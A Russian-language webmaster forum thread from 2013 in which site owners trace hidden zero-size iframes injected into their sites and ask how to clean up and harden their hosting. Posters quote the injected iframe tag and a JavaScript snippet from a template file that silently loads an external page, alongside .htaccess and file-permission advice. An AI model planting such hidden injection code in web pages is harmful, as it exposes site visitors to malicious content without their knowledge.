Maksiim

Рейтинг
51
Регистрация
14.08.2012
Электрик
medik777:
Бэкапы я делаю постоянно, поэтому проблем не вижу. Просто спрашиваю как с хостером поступать.
NewMoneyMaker я нашёл чисто случайно, внизу сайта справа, был какой то квадратик в 1px, я его в исходном коде не нашёл, но если нажать на него через: "проинспектировать элемент" в браузере-opera, то там видно его код, iframe, в коде сайта я его не нашёл, поэтому буду из бэкапа восстанавливать.

бэкап делаете самостоятельно или у хостера просите? как лучше

medik777:
у меня из партнерок только РСЯ стоит, у меня движок полу-самопис, у меня нету 309-ых строк.

попробуйте найти по тексту var ifn2i8N в файлах

кстати сегодня в панели гугл вебмастер тоже предупреждение о наличии кода, они указали полный путь к файлу где лежит вредоносный код

medik777:
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.

---------- Добавлено 07.08.2013 в 09:20 ----------

хостинг: хостлайф

у меня хостинг другой. Может как то через код партнерки? Нашел по пути /папка сайта/templates/папка шаблона/javascript в файле с именем hide.js , строка 309

код вида var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://******

Exquisitor:
вообще рекомендуется, не только на джулу\не джумлу - на папки 755 на файлы 644 (которые используются и выполняются)

спасибо, все также стоят. Можете объяснить как реализовать следующее:

"все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает

deny from all

либо запрещает вызов php

Options -Indexes

php_flag engine 0

RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml

AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml "

не подскажите какие права ставить на файлы и папки джумла для предотвращения несанкционированного доступа?

ugu123:
тоже на эту партнерку яша матерился - убрал...

это из-за нее получается. У тебя также был в панели вебмастера "поведенческий анализ"?

кроме удаления партнерки ни как не исправить?

---------- Добавлено 06.08.2013 в 17:10 ----------

TF-Studio, удалил строку с фреймом в папке шаблона. Подскажите есть ли еще вредоносный код?

TF-Studio:
Фрейм у вас с вирусом.


---------- Добавлено 06.08.2013 в 18:02 ----------

а где этот фрейм найти?

На 245 +- строчке - это ваш код?

это код партнерки ред клик

нашел код

var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://*.la*tye.com/';if9KRu.style.width = '0px';if9KRu.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if9KRu=') == -1) {document.cookie = 'if9KRu=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if9KRu);}};

это он?

Проблема решена.

12
Всего: 18